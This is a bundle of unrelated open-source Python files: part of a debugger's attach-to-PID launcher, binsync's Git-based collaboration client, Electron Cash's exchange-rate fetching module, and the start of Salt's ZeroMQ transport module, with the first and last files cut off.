host, port = Connection.listener.getsockname()
cmdline = [
sys.executable,
compat.filename(os.path.dirname(ptvsd.__file__)),
"--client",
"--host",
host,
"--port",
str(port),
]
if adapter.access_token is not None:
cmdline += ["--client-access-token", adapter.access_token]
cmdline += ptvsd_args
cmdline += ["--pid", str(pid)]
log.info("Spawning attach-to-PID debugger injector: {0!r}", cmdline)
try:
injector = subprocess.Popen(
cmdline,
bufsize=0,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
except Exception as exc:
log.exception("Failed to inject debug server into process with PID={0}", pid)
raise messaging.MessageHandlingError(
fmt(
"Failed to inject debug server into process with PID={0}: {1}", pid, exc
)
)
# We need to capture the output of the injector - otherwise it can get blocked
# on a write() syscall when it tries to print something.
def capture_output():
while True:
line = injector.stdout.readline()
if not line:
break
log.info("Injector[PID={0}] output:\n{1}", pid, line.rstrip())
log.info("Injector[PID={0}] exited.", pid)
thread = threading.Thread(
target=capture_output, name=fmt("Injector[PID={0}] output", pid)
)
thread.daemon = True
thread.start()
|
client.py
|
import time
import threading
import os
import subprocess
import re
import datetime
import logging
import typing
import git
import git.exc
import filelock
from .data import User, Function, Struct, Patch
from .state import State
from .errors import MetadataNotFoundError, ExternalUserCommitError
_l = logging.getLogger(name=__name__)
BINSYNC_BRANCH_PREFIX = 'binsync'
BINSYNC_ROOT_BRANCH = f'{BINSYNC_BRANCH_PREFIX}/__root__'
class ConnectionWarnings:
HASH_MISMATCH = 0
class StateContext(object):
def __init__(self, client, state, locked=False):
self.client = client
self.state = state
self.locked = locked
def __enter__(self):
if self.locked:
self.client.commit_lock.acquire()
return self.state
def __exit__(self, exc_type, exc_val, exc_tb):
if self.locked:
self.client.commit_lock.release()
self.client.commit_state(state=self.state)
class Client(object):
"""
The binsync Client.
:ivar str master_user: User name of the master user.
:ivar str repo_root: Local path of the Git repo.
:ivar str remote: Git remote.
:ivar int _commit_interval: The interval for committing local changes into the Git repo, pushing to the remote
side, and pulling from the remote.
"""
def __init__(
self,
master_user,
repo_root,
binary_hash,
remote="origin",
commit_interval=10,
init_repo=False,
remote_url=None,
ssh_agent_pid=None,
ssh_auth_sock=None
):
"""
:param str master_user: The username of the current user
:param str repo_root: The path to the repository directory to be loaded or created
:param str binary_hash: The binary's md5 hash, as a hex string, for validation
:param remote:
:param commit_interval:
:param init_repo:
:param remote_url:
:param ssh_agent_pid:
:param ssh_auth_sock:
"""
self.master_user = master_user
self.repo_root = repo_root
self.binary_hash = binary_hash
self.remote = remote
self.repo = None
self.repo_lock = None
if master_user.endswith('/') or '__root__' in master_user:
raise Exception(f"Bad username: {master_user}")
# ssh-agent info
self.ssh_agent_pid = ssh_agent_pid # type: int
self.ssh_auth_sock = ssh_auth_sock # type: str
self.connection_warnings = []
# three scenarios
# 1. We already have the repo checked out
# 2. We haven't checked out the repo, but there is a remote repo. In this case, we clone the repo from
# @remote_url
# 3. There is no such repo, and we are the very first group of people trying to setup this repo. In this case,
# @init_repo should be True, and we will initialize the repo.
try:
# case 1
# open the local repo
self.repo = git.Repo(self.repo_root)
# Initialize branches
self.init_remote()
if init_repo:
raise Exception("Could not initialize repository - it already exists!")
if not any(b.name == BINSYNC_ROOT_BRANCH for b in self.repo.branches):
raise Exception(f"This is not a binsync repo - it must have a {BINSYNC_ROOT_BRANCH} branch.")
except (git.NoSuchPathError, git.InvalidGitRepositoryError):
# initialization
if remote_url:
# case 2
self.repo = self.clone(remote_url)
elif init_repo:
# case 3
self.repo = git.Repo.init(self.repo_root)
self._setup_repo()
else:
raise
stored = self._get_stored_hash()
if stored != binary_hash:
self.connection_warnings.append(ConnectionWarnings.HASH_MISMATCH)
assert not self.repo.bare, "it should not be a bare repo"
self.repo_lock = filelock.FileLock(self.repo_root + "/.git/binsync.lock")
try:
self.repo_lock.acquire(timeout=0)
except filelock.Timeout as e:
raise Exception("Can only have one binsync client touching a local repository at once.\n"
"If the previous client crashed, you need to delete " + self.repo_root + "/.git/binsync.lock") from e
# check out the appropriate branch
try:
branch = next(o for o in self.repo.branches if o.name.endswith(self.user_branch_name))
except StopIteration:
branch = self.repo.create_head(self.user_branch_name, BINSYNC_ROOT_BRANCH)
else:
if branch.is_remote():
branch = self.repo.create_head(self.user_branch_name)
branch.checkout()
self._commit_interval = commit_interval
self._updater_thread = None
self._last_push_at = None # type: datetime.datetime
self.last_push_attempt_at = None # type: datetime.datetime
self._last_pull_at = None # type: datetime.datetime
self.last_pull_attempt_at = None # type: datetime.datetime
# timestamps
self._last_commit_ts = 0
self.state = None
self.commit_lock = threading.Lock()
def init_remote(self):
"""
Init PyGits view of remote references in a repo.
"""
# get all remote branches
try:
branches = self.repo.remote().refs
except ValueError:
return
# track any remote we are not already tracking
for branch in branches:
if "HEAD" in branch.name:
continue
try:
self.repo.git.checkout('--track', branch.name)
except git.GitCommandError as e:
pass
def __del__(self):
if self.repo_lock is not None:
self.repo_lock.release()
@property
def user_branch_name(self):
return f"{BINSYNC_BRANCH_PREFIX}/{self.master_user}"
@property
def has_remote(self):
"""
If there is a remote configured for our local repo.
:return: True if there is a remote, False otherwise.
"""
return self.remote and self.repo.remotes and any(r.name == self.remote for r in self.repo.remotes)
@property
def last_update_timestamp(self):
return self._last_commit_ts
def ssh_agent_env(self):
if self.ssh_agent_pid is not None and self.ssh_auth_sock is not None:
env = {
'SSH_AGENT_PID': str(self.ssh_agent_pid),
'SSH_AUTH_SOCK': str(self.ssh_auth_sock),
}
else:
env = { }
return env
def add_remote(self, name, remote_url):
"""
Add a remote to the local repo.
:param name:
:param remote_url:
:return:
"""
self.repo.create_remote(name, url=remote_url)
def clone(self, remote_url):
"""
Checkout from a remote_url to a local path specified by self.local_root.
:param str remote_url: The URL of the Git remote.
:return: None
"""
env = self.ssh_agent_env()
repo = git.Repo.clone_from(remote_url, self.repo_root, env=env)
try:
repo.create_head(BINSYNC_ROOT_BRANCH, f'{self.remote}/{BINSYNC_ROOT_BRANCH}')
except git.BadName:
raise Exception(f"This is not a binsync repo - it must have a {BINSYNC_ROOT_BRANCH} branch")
return repo
def checkout_to_master_user(self):
"""
Ensure the repo is in the proper branch for current user.
:return: bool
"""
self.repo.git.checkout(self.user_branch_name)
def pull(self, print_error=False):
"""
Pull changes from the remote side.
:return: None
"""
self.last_pull_attempt_at = datetime.datetime.now()
self.checkout_to_master_user()
if self.has_remote:
try:
env = self.ssh_agent_env()
with self.repo.git.custom_environment(**env):
self.repo.remotes[self.remote].pull()
self._last_pull_at = datetime.datetime.now()
except git.exc.GitCommandError as ex:
if print_error:
print("Failed to pull from remote \"%s\".\n"
"\n"
"Git error: %s." % (
self.remote,
str(ex)
))
def push(self, print_error=False):
"""
Push local changes to the remote side.
:return: None
"""
self.last_push_attempt_at = datetime.datetime.now()
self.checkout_to_master_user()
if self.has_remote:
try:
env = self.ssh_agent_env()
with self.repo.git.custom_environment(**env):
self.repo.remotes[self.remote].push(BINSYNC_ROOT_BRANCH)
self.repo.remotes[self.remote].push(self.user_branch_name)
self._last_push_at = datetime.datetime.now()
except git.exc.GitCommandError as ex:
if print_error:
print("Failed to push to remote \"%s\".\n"
"Did you setup %s/master as the upstream of the local master branch?\n"
"\n"
"Git error: %s." % (
self.remote,
self.remote,
str(ex)
))
def users(self) -> typing.Iterable[User]:
for ref in self._get_best_refs():
try:
metadata = State.load_metadata(ref.commit.tree)
yield User.from_metadata(metadata)
except Exception as e:
continue
def tally(self, users=None):
"""
Return a dict of user names and what information they can provide, e.g.,
{"user":
{
"functions": [0x400080],
}
}
:param list users: A list of user names or None if we don't want to limit the range of user names we care about.
:return: A dict with tally information.
:rtype: dict
"""
if users is not None:
users = set(users)
else:
users = [x.name for x in self.users()]
all_info = {}
for user in self.users():
if user is None or user.name not in users:
continue
# what information does this user provide?
info = {}
state = self.get_state(user=user.name)
info["function"] = list(state.functions.keys())
#info["comments"] = list(state.comments.keys())
info["patches"] = list(
{"obj_name": p.obj_name, "offset": p.offset}
for p in state.patches.values()
)
all_info[user.name] = info
return all_info
def status(self):
"""
Return a dict of status information.
"""
d = {}
d['remote_name'] = self.remote
if self.repo is not None:
d['last_commit_hash'] = self.repo.heads[0].commit.hexsha
try:
d['last_commit_time'] = self.repo.heads[0].commit.committed_datetime.replace(tzinfo=None)
except IOError: # sometimes GitPython throws this exception
d['last_commit_time'] = "<unknown>"
if any(r.name == self.remote for r in self.repo.remotes):
d['remote_url'] = ";".join(self.repo.remotes[self.remote].urls)
else:
d['remote_url'] = "<does not exist>"
d['last_change'] = self._last_push_at if self._last_push_at is not None else "never"
d['last_push_attempt'] = self.last_push_attempt_at if self.last_push_attempt_at is not None else "never"
d['last_pull'] = self._last_pull_at if self._last_pull_at is not None else "never"
d['last_pull_attempt'] = self.last_pull_attempt_at if self.last_pull_attempt_at is not None else "never"
return d
def state_ctx(self, user=None, version=None, locked=False):
state = self.get_state(user=user, version=version)
return StateContext(self, state, locked=locked)
def get_tree(self, user):
with self.commit_lock:
options = [ref for ref in self.repo.refs if ref.name.endswith(f"{BINSYNC_BRANCH_PREFIX}/{user}")]
if not options:
raise ValueError(f'No such user "{user}" found in repository')
# find the latest commit for the specified user!
best = max(options, key=lambda ref: ref.commit.authored_date)
bct = best.commit.tree
return bct
def get_state(self, user=None, version=None):
if user is None or user == self.master_user:
# local state
if self.state is None:
try:
self.state = State.parse(
self.get_tree(user=self.master_user), version=version,
client=self,
) # Also need to check if user is none here???
except MetadataNotFoundError:
# we should return a new state
self.state = State(user if user is not None else self.master_user, client=self)
return self.state
else:
try:
state = State.parse(self.get_tree(user=user), version=version, client=self)
return state
except MetadataNotFoundError:
return None
def get_locked_state(self, user=None, version=None):
with self.commit_lock:
yield self.get_state(user=user, version=version)
def start_updater_thread(self):
if self._updater_thread is None:
self._updater_thread = threading.Thread(target=self._updater_routine)
self._updater_thread.start()
else:
raise Exception(
"start_updater_thread() should not be called twice. There is already a worker thread running."
)
def _updater_routine(self):
while True:
time.sleep(self._commit_interval)
self.update()
def update(self):
"""
Update both the local and remote repo knowledge of files through pushes/pulls and commits
in the case of dirty files.
"""
# do a pull if there is a remote repo connected
if self.has_remote:
self.pull()
# attempt to commit dirty files in a update phase
if self.get_state().dirty:
self.commit_state()
if self.has_remote:
self.push()
self._last_commit_ts = time.time()
def commit_state(self, state=None, msg="Generic Change"):
with self.commit_lock:
self.checkout_to_master_user()
if state is None:
state = self.state
if self.master_user != state.user:
raise ExternalUserCommitError(f"User {self.master_user} is not allowed to commit to user {state.user}")
assert self.master_user == state.user
master_user_branch = next(o for o in self.repo.branches if o.name == self.user_branch_name)
index = self.repo.index
# dump the state
state.dump(index)
# commit changes
self.repo.index.add([os.path.join(state.user, "*")])
if not self.repo.index.diff("HEAD"):
return
# commit if there is any difference
try:
commit = index.commit(msg)
except Exception:
print("[BinSync]: Internal Git Commit Error!")
return
master_user_branch.commit = commit
state._dirty = False
self.push()
def sync_states(self, user=None):
target_state = self.get_state(user)
if target_state is None:
print("Unable to find state for user", user)
return
my_state = self.get_state(self.master_user)
my_state.copy_state(target_state)
self.commit_state()
@staticmethod
def discover_ssh_agent(ssh_agent_cmd):
proc = subprocess.Popen(ssh_agent_cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = proc.communicate()
stdout = stdout.decode("utf-8")
stderr = stderr.decode("utf-8")
if proc.returncode != 0 or stderr:
raise RuntimeError("Failed to discover SSH agent by running command %s.\n"
"Return code: %d.\n"
"stderr: %s" % (
ssh_agent_cmd,
proc.returncode,
stderr,
))
# parse output
m = re.search(r"Found ssh-agent at (\d+)", stdout)
if m is None:
print("Failed to find 'Found ssh-agent at'")
m = re.search(r"SSH_AGENT_PID=(\d+);", stdout)
if m is None:
print("Failed to find SSH_AGENT_PID")
return None, None
print("Found SSH_AGENT_PID")
ssh_agent_pid = int(m.group(1))
m = re.search("SSH_AUTH_SOCK=(.*?);", stdout)
if m is None:
print("Failed to find SSH_AUTH_SOCK")
return None, None
print("Found SSH_AGENT_SOCK")
ssh_agent_sock = m.group(1)
else :
print("Found ssh-agent at")
ssh_agent_pid = int(m.group(1))
m = re.search(r"Found ssh-agent socket at ([^\s]+)", stdout)
if m is None:
print("Failed to find 'Found ssh-agent socket at'")
return None, None
print("Found ssh-agent socket at")
ssh_agent_sock = m.group(1)
return ssh_agent_pid, ssh_agent_sock
def close(self):
self.repo.close()
del self.repo
def _get_best_refs(self):
candidates = {}
for ref in self.repo.refs: # type: git.Reference
if f'{BINSYNC_BRANCH_PREFIX}/' not in ref.name:
continue
branch_name = ref.name.split("/")[-1]
if branch_name in candidates:
# if the candidate exists, and the new one is not remote, don't replace it
if not ref.is_remote() or ref.remote_name != self.remote:
continue
candidates[branch_name] = ref
return candidates.values()
def _setup_repo(self):
with open(os.path.join(self.repo_root, ".gitignore"), "w") as f:
f.write(".git/*\n")
with open(os.path.join(self.repo_root, "binary_hash"), "w") as f:
f.write(self.binary_hash)
self.repo.index.add([".gitignore", "binary_hash"])
self.repo.index.commit("Root commit")
self.repo.create_head(BINSYNC_ROOT_BRANCH)
def _get_stored_hash(self):
branch = [ref for ref in self.repo.refs if ref.name.endswith(BINSYNC_ROOT_BRANCH)][0]
return branch.commit.tree["binary_hash"].data_stream.read().decode().strip("\n")
|
exchange_rate.py
|
from datetime import datetime
import inspect
import requests
import sys
import os
import json
import pkgutil
from threading import Thread
import time
import csv
import decimal
from decimal import Decimal as PyDecimal # Qt 5.12 also exports Decimal
from collections import defaultdict
from . import networks
from .bitcoin import COIN
from .i18n import _
from .util import PrintError, ThreadJob, print_error, inv_base_units
DEFAULT_ENABLED = True
DEFAULT_CURRENCY = "USD"
DEFAULT_EXCHANGE = "CoinGecko" # Note the exchange here should ideally also support history rates
# See https://en.wikipedia.org/wiki/ISO_4217
CCY_PRECISIONS = {'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0,
'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0,
'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3,
'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0,
'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0,
'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0}
class ExchangeBase(PrintError):
def __init__(self, on_quotes, on_history):
self.history = {}
self.history_timestamps = defaultdict(float)
self.quotes = {}
self.on_quotes = on_quotes
self.on_history = on_history
def get_json(self, site, get_string):
# APIs must have https
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electron Cash'}, timeout=10)
if response.status_code != 200:
raise RuntimeWarning("Response status: " + str(response.status_code))
return response.json()
def get_csv(self, site, get_string):
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electron-Cash'})
if response.status_code != 200:
raise RuntimeWarning("Response status: " + str(response.status_code))
reader = csv.DictReader(response.content.decode().split('\n'))
return list(reader)
def name(self):
return self.__class__.__name__
def update_safe(self, ccy):
try:
self.print_error("getting fx quotes for", ccy)
self.quotes = self.get_rates(ccy)
self.print_error("received fx quotes")
except Exception as e:
self.print_error("failed fx quotes:", e)
self.on_quotes()
def update(self, ccy):
t = Thread(target=self.update_safe, args=(ccy,), daemon=True)
t.start()
def read_historical_rates(self, ccy, cache_dir):
filename = self._get_cache_filename(ccy, cache_dir)
h, timestamp = None, 0.0
if os.path.exists(filename):
timestamp = os.stat(filename).st_mtime
try:
with open(filename, 'r', encoding='utf-8') as f:
h = json.loads(f.read())
if h:
self.print_error("read_historical_rates: returning cached history from", filename)
except Exception as e:
self.print_error("read_historical_rates: error", repr(e))
h = h or None
return h, timestamp
def _get_cache_filename(self, ccy, cache_dir):
return os.path.join(cache_dir, self.name() + '_' + ccy)
@staticmethod
def _is_timestamp_old(timestamp):
HOUR = 60.0*60.0 # number of seconds in an hour
return time.time() - timestamp >= 24.0 * HOUR # check history rates every 24 hours, as the granularity is per-day anyway
def is_historical_rate_old(self, ccy):
return self._is_timestamp_old(self.history_timestamps.get(ccy, 0.0))
def _cache_historical_rates(self, h, ccy, cache_dir):
''' Writes the history, h, to the cache file. Catches its own exceptions
and always returns successfully, even if the write process failed. '''
wroteBytes, filename = 0, '(none)'
try:
filename = self._get_cache_filename(ccy, cache_dir)
with open(filename, 'w', encoding='utf-8') as f:
f.write(json.dumps(h))
wroteBytes = os.stat(filename).st_size
except Exception as e:
self.print_error("cache_historical_rates error:", repr(e))
return False
self.print_error(f"cache_historical_rates: wrote {wroteBytes} bytes to file {filename}")
return True
def get_historical_rates_safe(self, ccy, cache_dir):
h, timestamp = self.read_historical_rates(ccy, cache_dir)
if not h or self._is_timestamp_old(timestamp):
try:
self.print_error("requesting fx history for", ccy)
h = self.request_history(ccy)
self.print_error("received fx history for", ccy)
if not h:
# Paranoia: No data; abort early rather than write out an
# empty file
raise RuntimeWarning(f"received empty history for {ccy}")
self._cache_historical_rates(h, ccy, cache_dir)
except Exception as e:
self.print_error("failed fx history:", repr(e))
return
self.print_error("received history rates of length", len(h))
self.history[ccy] = h
self.history_timestamps[ccy] = timestamp
self.on_history()
def get_historical_rates(self, ccy, cache_dir):
result, timestamp = self.history.get(ccy), self.history_timestamps.get(ccy, 0.0)
if (not result or self._is_timestamp_old(timestamp)) and ccy in self.history_ccys():
t = Thread(target=self.get_historical_rates_safe, args=(ccy, cache_dir), daemon=True)
t.start()
return result
def history_ccys(self):
return []
def historical_rate(self, ccy, d_t):
return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d'))
def get_currencies(self):
rates = self.get_rates('')
return sorted([str(a) for (a, b) in rates.items() if b is not None and len(a)==3])
class BitcoinAverage(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('apiv2.bitcoinaverage.com', '/indices/global/ticker/short')
return dict([(r.replace("BCH", ""), PyDecimal(json[r]['last']))
for r in json if r != 'timestamp'])
# note: historical rates used to be freely available
# but this is no longer the case. see spesmilo#5188
# (Turned off until the unlikely event that the situation changes.)
#def history_ccys(self):
# return ['AUD', 'BRL', 'CAD', 'CHF', 'CNY', 'EUR', 'GBP', 'IDR', 'ILS',
# 'MXN', 'NOK', 'NZD', 'PLN', 'RON', 'RUB', 'SEK', 'SGD', 'USD',
# 'ZAR']
#
#def request_history(self, ccy):
# history = self.get_csv('apiv2.bitcoinaverage.com',
# "/indices/global/history/BCH%s?period=alltime&format=csv" % ccy)
# return dict([(h['DateTime'][:10], h['Average'])
# for h in history])
class BitPay(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bitpay.com', '/rates/BCH')
return dict([(r['code'], PyDecimal(r['rate'])) for r in json['data']])
class Bitso(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitso.com', '/v2/ticker/?book=bch_btc')
return {'BTC': PyDecimal(json['last'])}
class BitStamp(ExchangeBase):
def get_rates(self, ccy):
json_usd = self.get_json('www.bitstamp.net', '/api/v2/ticker/bchusd')
json_eur = self.get_json('www.bitstamp.net', '/api/v2/ticker/bcheur')
json_btc = self.get_json('www.bitstamp.net', '/api/v2/ticker/bchbtc')
return {
'USD': PyDecimal(json_usd['last']),
'EUR': PyDecimal(json_eur['last']),
'BTC': PyDecimal(json_btc['last'])}
class Coinbase(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.coinbase.com',
'/v2/exchange-rates?currency=BCH')
return {ccy: PyDecimal(rate) for (ccy, rate) in json["data"]["rates"].items()}
class Kraken(ExchangeBase):
def get_rates(self, ccy):
ccys = ['EUR', 'USD']
pairs = ['BCH%s' % c for c in ccys]
json = self.get_json('api.kraken.com',
'/0/public/Ticker?pair=%s' % ','.join(pairs))
return dict((k[-3:], PyDecimal(float(v['c'][0])))
for k, v in json['result'].items())
class CoinCap(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.coincap.io', '/v2/rates/bitcoin-cash/')
return {'USD': PyDecimal(json['data']['rateUsd'])}
def history_ccys(self):
return ['USD']
def request_history(self, ccy):
from datetime import datetime as dt
# Currently 2000 days is the maximum in 1 API call which needs to be fixed
# sometime before the year 2023...
history = self.get_json('api.coincap.io',
"/v2/assets/bitcoin-cash/history?interval=d1&limit=2000")
return dict([(dt.utcfromtimestamp(h['time']/1000).strftime('%Y-%m-%d'),
h['priceUsd'])
for h in history['data']])
class CoinGecko(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.coingecko.com', '/api/v3/coins/bitcoin-cash?localization=False&sparkline=false')
prices = json["market_data"]["current_price"]
return dict([(a[0].upper(),PyDecimal(a[1])) for a in prices.items()])
def history_ccys(self):
return ['AED', 'ARS', 'AUD', 'BTD', 'BHD', 'BMD', 'BRL', 'BTC',
'CAD', 'CHF', 'CLP', 'CNY', 'CZK', 'DKK', 'ETH', 'EUR',
'GBP', 'HKD', 'HUF', 'IDR', 'ILS', 'INR', 'JPY', 'KRW',
'KWD', 'LKR', 'LTC', 'MMK', 'MXH', 'MYR', 'NOK', 'NZD',
'PHP', 'PKR', 'PLN', 'RUB', 'SAR', 'SEK', 'SGD', 'THB',
'TRY', 'TWD', 'USD', 'VEF', 'VND', 'XAG', 'XAU', 'XDR',
'ZAR']
def request_history(self, ccy):
history = self.get_json('api.coingecko.com', '/api/v3/coins/bitcoin-cash/market_chart?vs_currency=%s&days=max' % ccy)
from datetime import datetime as dt
return dict([(dt.utcfromtimestamp(h[0]/1000).strftime('%Y-%m-%d'), h[1])
for h in history['prices']])
class BitstampYadio(ExchangeBase):
def get_rates(self, ccy):
json_usd = self.get_json('www.bitstamp.net', '/api/v2/ticker/bchusd')
json_ars = self.get_json('api.yadio.io', '/exrates/ARS')
return {'ARS': PyDecimal(json_usd['last']) / PyDecimal(json_ars['ARS']['USD'])}
def dictinvert(d):
inv = {}
for k, vlist in d.items():
for v in vlist:
keys = inv.setdefault(v, [])
keys.append(k)
return inv
def get_exchanges_and_currencies():
try:
data = pkgutil.get_data(__name__, 'currencies.json')
return json.loads(data.decode('utf-8'))
except:
pass
path = os.path.join(os.path.dirname(__file__), 'currencies.json')
d = {}
is_exchange = lambda obj: (inspect.isclass(obj)
and issubclass(obj, ExchangeBase)
and obj != ExchangeBase)
exchanges = dict(inspect.getmembers(sys.modules[__name__], is_exchange))
for name, klass in exchanges.items():
exchange = klass(None, None)
try:
d[name] = exchange.get_currencies()
print_error(name, "ok")
except:
print_error(name, "error")
continue
with open(path, 'w', encoding='utf-8') as f:
f.write(json.dumps(d, indent=4, sort_keys=True))
return d
CURRENCIES = get_exchanges_and_currencies()
def get_exchanges_by_ccy(history=True):
if not history:
return dictinvert(CURRENCIES)
d = {}
exchanges = CURRENCIES.keys()
for name in exchanges:
try:
klass = globals()[name]
except KeyError:
# can happen if currencies.json is not in synch with this .py file, see #1559
continue
exchange = klass(None, None)
d[name] = exchange.history_ccys()
return dictinvert(d)
class FxThread(ThreadJob):
default_currency = DEFAULT_CURRENCY
default_exchange = DEFAULT_EXCHANGE
def __init__(self, config, network):
self.config = config
self.network = network
self.ccy = self.get_currency()
self.history_used_spot = False
self.ccy_combo = None
self.hist_checkbox = None
self.timeout = 0.0
self.cache_dir = os.path.join(config.path, 'cache')
self.set_exchange(self.config_exchange())
if not os.path.exists(self.cache_dir):
os.mkdir(self.cache_dir)
def get_currencies(self, h):
d = get_exchanges_by_ccy(h)
return sorted(d.keys())
def get_exchanges_by_ccy(self, ccy, h):
d = get_exchanges_by_ccy(h)
return d.get(ccy, [])
def ccy_amount_str(self, amount, commas, default_prec=2, is_diff=False):
prec = CCY_PRECISIONS.get(self.ccy, default_prec)
diff_str = ''
if is_diff:
diff_str = '+' if amount >= 0 else '-'
fmt_str = "%s{:%s.%df}" % (diff_str, "," if commas else "", max(0, prec))
try:
rounded_amount = round(amount, prec)
except decimal.InvalidOperation:
rounded_amount = amount
return fmt_str.format(rounded_amount)
def run(self):
"""This runs from the Network thread. It is invoked roughly every
100ms (see network.py), with actual work being done every 2.5 minutes."""
if self.is_enabled():
if self.timeout <= time.time():
self.exchange.update(self.ccy)
if (self.show_history()
and (self.timeout == 0 # forced update
# OR > 24 hours have expired
or self.exchange.is_historical_rate_old(self.ccy))):
# Update historical rates. Note this doesn't actually
# go out to the network unless cache file is missing
# and/or >= 24 hours have passed since last fetch.
self.exchange.get_historical_rates(self.ccy, self.cache_dir)
# And, finally, update self.timeout so we execute this branch
# every ~2.5 minutes
self.timeout = time.time() + 150
@staticmethod
def is_supported():
"""Fiat currency is only supported on BCH MainNet, for all other chains it is not supported."""
return not networks.net.TESTNET
def is_enabled(self):
return bool(self.is_supported() and self.config.get('use_exchange_rate', DEFAULT_ENABLED))
def set_enabled(self, b):
return self.config.set_key('use_exchange_rate', bool(b))
def get_history_config(self):
return bool(self.config.get('history_rates'))
def set_history_config(self, b):
self.config.set_key('history_rates', bool(b))
def get_fiat_address_config(self):
return bool(self.config.get('fiat_address'))
def set_fiat_address_config(self, b):
self.config.set_key('fiat_address', bool(b))
def get_currency(self):
"""Use when dynamic fetching is needed"""
return self.config.get("currency", self.default_currency)
def config_exchange(self):
"""Returns the currently-configured exchange."""
return self.config.get('use_exchange', self.default_exchange)
def show_history(self):
return self.is_enabled() and self.get_history_config() and self.ccy in self.exchange.history_ccys()
def set_currency(self, ccy):
self.ccy = ccy
if self.get_currency() != ccy:
self.config.set_key('currency', ccy, True)
self.timeout = 0 # Force update because self.ccy changes
self.on_quotes()
def set_exchange(self, name):
default_class = globals().get(self.default_exchange)
class_ = globals().get(name, default_class)
if self.config_exchange() != name:
self.config.set_key('use_exchange', name, True)
self.exchange = class_(self.on_quotes, self.on_history)
if self.get_history_config() and self.ccy not in self.exchange.history_ccys() and class_ != default_class:
# this exchange has no history for this ccy. Try the default exchange.
# If that also fails the user will be stuck in a strange UI
# situation where the checkbox is checked but they see no history
# Note this code is here to migrate users from previous history
# API exchanges in config that are no longer serving histories.
self.set_exchange(self.default_exchange)
return
self.print_error("using exchange", name)
# A new exchange means new fx quotes, initially empty.
# This forces a quote refresh, which will happen in the Network thread.
self.timeout = 0
def on_quotes(self):
if self.network:
self.network.trigger_callback('on_quotes')
def on_history(self):
if self.network:
self.network.trigger_callback('on_history')
def exchange_rate(self):
'''Returns None, or the exchange rate as a PyDecimal'''
rate = self.exchange.quotes.get(self.ccy)
if rate:
return PyDecimal(rate)
def format_amount_and_units(self, btc_balance, is_diff=False, commas=True):
amount_str = self.format_amount(btc_balance, is_diff=is_diff, commas=commas)
return '' if not amount_str else "%s %s" % (amount_str, self.ccy)
def format_amount(self, btc_balance, is_diff=False, commas=True):
rate = self.exchange_rate()
return ('' if rate is None
else self.value_str(btc_balance, rate, is_diff=is_diff, commas=commas))
def get_fiat_status_text(self, btc_balance, base_unit, decimal_point):
rate = self.exchange_rate()
default_prec = 2
if base_unit == inv_base_units.get(2): # if base_unit == 'bits', increase precision on fiat as bits is pretty tiny as of 2019
default_prec = 4
return _(" (No FX rate available)") if rate is None else " 1 %s~%s %s" % (base_unit,
self.value_str(COIN / (10**(8 - decimal_point)), rate, default_prec ), self.ccy )
def value_str(self, satoshis, rate, default_prec=2, is_diff=False, commas=True):
if satoshis is None: # Can happen with incomplete history
return _("Unknown")
if rate:
value = PyDecimal(satoshis) / COIN * PyDecimal(rate)
return "%s" % (self.ccy_amount_str(value, commas, default_prec, is_diff=is_diff))
return _("No data")
def fiat_to_amount(self, fiat):
rate = self.exchange_rate()
return (None if rate is None
else int(PyDecimal(fiat) / rate * COIN))
def history_rate(self, d_t):
rate = self.exchange.historical_rate(self.ccy, d_t)
# Frequently there is no rate for today, until tomorrow :)
# Use spot quotes in that case
if rate is None and (datetime.today().date() - d_t.date()).days <= 2:
rate = self.exchange.quotes.get(self.ccy)
self.history_used_spot = True
return PyDecimal(rate) if rate is not None else None
def historical_value_str(self, satoshis, d_t):
rate = self.history_rate(d_t)
return self.value_str(satoshis, rate)
def historical_value(self, satoshis, d_t):
rate = self.history_rate(d_t)
if rate:
return PyDecimal(satoshis) / COIN * PyDecimal(rate)
def timestamp_rate(self, timestamp):
from .util import timestamp_to_datetime
date = timestamp_to_datetime(timestamp)
return self.history_rate(date)
|
zeromq.py
|
# -*- coding: utf-8 -*-
'''
Zeromq transport classes
'''
# Import Python Libs
from __future__ import absolute_import, print_function, unicode_literals
import os
import sys
import copy
import errno
import signal
import hashlib
import logging
import weakref
from random import randint
# Import Salt Libs
import salt.auth
import salt.crypt
import salt.utils.event
import salt.utils.files
import salt.utils.minions
import salt.utils.process
import salt.utils.stringutils
import salt.utils.verify
import salt.utils.zeromq
import salt.payload
import salt.transport.client
import salt.transport.server
import salt.transport.mixins.auth
from salt.ext import six
from salt.exceptions import SaltReqTimeoutError
from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO, LIBZMQ_VERSION_INFO
import zmq.error
import zmq.eventloop.ioloop
import zmq.eventloop.zmqstream
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# Import Tornado Libs
import tornado
import tornado.gen
import tornado.concurrent
# Import third party libs
try:
from M2Crypto import RSA
HAS_M2 = True
except ImportError:
HAS_M2 = False
try:
from Cryptodome.Cipher import PKCS1_OAEP
except ImportError:
from Crypto.Cipher import PKCS1_OAEP
log = logging.getLogger(__name__)
def _get_master_uri(master_ip,
master_port,
source_ip=None,
source_port=None):
'''
Return the ZeroMQ URI to connect the Minion to the Master.
It supports different source IP / port, given the ZeroMQ syntax:
// Connecting using a IP address and bind to an IP address
rc = zmq_connect(socket, "tcp://192.168.1.17:5555;192.168.1.1:5555"); assert (rc == 0);
